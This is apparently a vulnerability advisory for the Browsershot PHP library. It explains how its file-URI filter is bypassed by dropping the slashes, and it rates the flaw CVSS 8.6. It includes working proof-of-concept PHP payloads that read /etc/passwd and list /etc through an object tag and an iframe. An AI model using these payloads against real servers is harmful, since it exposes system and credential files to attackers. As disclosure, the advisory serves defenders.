The Browsershot::html() function in Browsershot < 5.0.5, which is used to convert HTML inputs into PDF/images, is vulnerable to arbitrary file read and system directory listing. An attacker can forge a HTML document that performs local file read. This vulnerability arises because the Same-origin policy (SOP) does not block local file references when the origin is a local HTML document.
The setHtml() function, invoked by Browsershot::html(), attempts to validate user input by blocking file URI schemes (e.g., file:// and file:/) in the HTML content. However, an attacker can bypass this validation by omitting the slashes in the file URI (e.g., file:../../../../etc/passwd).
The affected function (Browershot v5.0.3):
public function setHtml(string $html): static
{
if (str_contains(strtolower($html), 'file://') || str_contains(strtolower($html), 'file:/')) {
throw HtmlIsNotAllowedToContainFile::make();
}
$this->html = $html;
$this->url = '';
$this->hideBrowserHeaderAndFooter();
return $this;
}Arbitrary file read:
require 'vendor/autoload.php';
use Spatie\Browsershot\Browsershot;
$code = '<object data="file:../../../etc/passwd" width="500" height="400">';
Browsershot::html($code)
->save('html.pdf');
System directory listing:
require 'vendor/autoload.php';
use Spatie\Browsershot\Browsershot;
$code = <<<HTML
<iframe src="file:../../../../etc" width="500" height="400"></iframe>
HTML;
Browsershot::html($code)
->save('html.pdf');
CIA: The vulnerability leads to arbitrary file read on a system that utilizes Browsershot. Integrity and availabiity are not affected.
Scope: The vulnerability can affect resources (the web server's file system) beyond the security scope managed by the security authority of the vulnerable component (Browsershot package).
CVSS 3.1: High - 8.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)